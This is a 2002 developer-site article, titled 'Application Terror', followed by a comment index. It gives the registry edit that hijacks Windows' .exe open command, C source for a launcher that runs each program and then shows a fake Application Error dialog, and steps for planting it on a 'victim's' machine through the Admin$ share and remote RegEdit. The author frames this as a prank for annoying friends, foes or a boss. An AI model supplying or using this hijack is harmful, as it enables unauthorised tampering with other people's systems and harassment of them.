Click here to Skip to main content
Click here to Skip to main content

Application Terror

, 28 May 2002 Ms-PL
Rate this:
Please Sign up or sign in to vote.
How to (really) annoy your friends and foes or even your boss.

Sample Image - Application_Terror.jpg

Being Bad

If you ever wanted to annoy someone really, here is a way to do it. Windows stores for .exe files a registry key which specifies what to do with a ".exe" file. It is located at HKEY_CLASSES_ROOT\exefile\shell\open\command and normally contains the value "%1" %* which just means: do what the first parameter specifies and pass the rest of the parameters as new parameters. As you may know, the first parameter is the full name of the .exe file to be executed.

And here we start with our nasty trick. We redirect the command line to our "application". We do this by modifying the registry key:

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"aelaunch.exe\" %1 %*"

You see already that our application is named AELAUNCH.EXE (you can give it any name) and takes some parameters.

The Bad One

Well, from now on, any application seems to generate an application error but still continues to run somehow.

The application is no miracle, it doesn't need nor use MFC. The whole code is just about 50 lines including comments. The main function is:

int APIENTRY _tWinMain(HINSTANCE hInst, 
   HINSTANCE,LPTSTR lpCmdLine, int nCmdShow)
{
    if (lpCmdLine[0] != '\0') // we have a command line?
    {
        LPSTR p = lpCmdLine;
        while(*p)
        {
            if(*p == '\"') // lets get rid of any quotes
                *p = ' ';
            p++;
        }
        // ::MessageBox(NULL, lpCmdLine, "Commandline", MB_OK);
        WinExec(lpCmdLine, nCmdShow);
    }

    DialogBox(hInst, (LPCTSTR)IDD_APPLICATIONTERROR_DIALOG, 
                                   NULL, (DLGPROC)DialogProc);
    
    return 0;
}

It uses the "obsolete" function WinExec() just because it's convenient and works perfectly. Using CreateProcess() or ShellExecute() would cause far too much trouble.

As you see, the application checks for a command line, replaces any existing quote characters with spaces (we really don't need them here anymore) and passes the command line to WinExec.

When WinExec returns (as soon as the starting application calls the first time, GetMessage()), the application shows a dialog which happen to look like the well known Application Error dialog. Smile | :)

Relax and Enjoy

Now you may wonder how this will annoy anyone? Remember a default share called Admin$? And do you remember that RegEdit can connect to other machines? Bingo, just copy the executable to your victim's Admin$\system32 directory, run RegEdit and modify the registry of the victim's machine. Here you go...

Try it and smile, while making a mental list of who will be the next target for aelaunch.exe.

The last one whom I targeted with it suffered 2 days until he found what I did. It was a well done payback.

License

This article, along with any associated source code and files, is licensed under The Microsoft Public License (Ms-PL)

Share

About the Author

No Biography provided

Comments and Discussions

 
GeneralCompiling error.... PinmemberPiccinano20-Feb-03 0:16 
GeneralRe: Compiling error.... PinmemberAndreas Saurwein20-Feb-03 0:30 
GeneralIt can be useful! Pinmembervboctor6-Nov-02 19:33 
GeneralRe: It can be useful! PinmemberAndreas Saurwein7-Nov-02 3:23 
GeneralVirus PinmemberAnonymous3-Jun-02 16:27 
GeneralRe: Virus PinmemberPhilippe Lhoste4-Jun-02 4:27 
GeneralRe: Virus PinmemberAndreas Saurwein4-Jun-02 4:37 
GeneralRe: Virus (are you insane??) PinmemberPanchote6-Mar-04 19:40 
GeneralHeh PinmemberMatt Philmon29-May-02 17:49 
GeneralRe: Heh PinmemberAndreas Saurwein29-May-02 22:21 
GeneralKewl! PinmemberShog929-May-02 16:09 
GeneralRe: Kewl! PinmemberNish - Native CPian29-May-02 16:23 
GeneralRe: Kewl! PinmemberAndreas Saurwein29-May-02 22:24 
GeneralAnother idea PinmemberNish - Native CPian29-May-02 16:14 
GeneralRe: Another idea PinmemberAndreas Saurwein29-May-02 22:31 
GeneralHey :-) PinmemberNish - Native CPian29-May-02 16:07 
GeneralRe: Hey :-) PinmemberShog929-May-02 16:19 
GeneralRe: Hey :-) PinmemberNish - Native CPian29-May-02 16:22 
GeneralRe: Hey :-) PinmemberShog929-May-02 16:29 
GeneralRe: Hey :-) PinmemberNish - Native CPian29-May-02 16:37 
GeneralRe: Hey :-) PinmemberShog929-May-02 16:40 
GeneralRe: Hey :-) Pinmemberpeterchen30-May-02 2:08 
GeneralRe: Hey :-) PinmemberNinja-the-Nerd14-Dec-06 15:58 
GeneralBad PinmemberThomas Freudenberg29-May-02 14:46 
GeneralRe: Bad PinmemberAndreas Saurwein29-May-02 22:19 

General General    News News    Suggestion Suggestion    Question Question    Bug Bug    Answer Answer    Joke Joke    Rant Rant    Admin Admin   

Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.

| Advertise | Privacy | Terms of Use | Mobile
Web01 | 2.8.141223.1 | Last Updated 29 May 2002
Article Copyright 2002 by Andreas S. Franci Gonçalves
Everything else Copyright © CodeProject, 1999-2014
Layout: fixed | fluid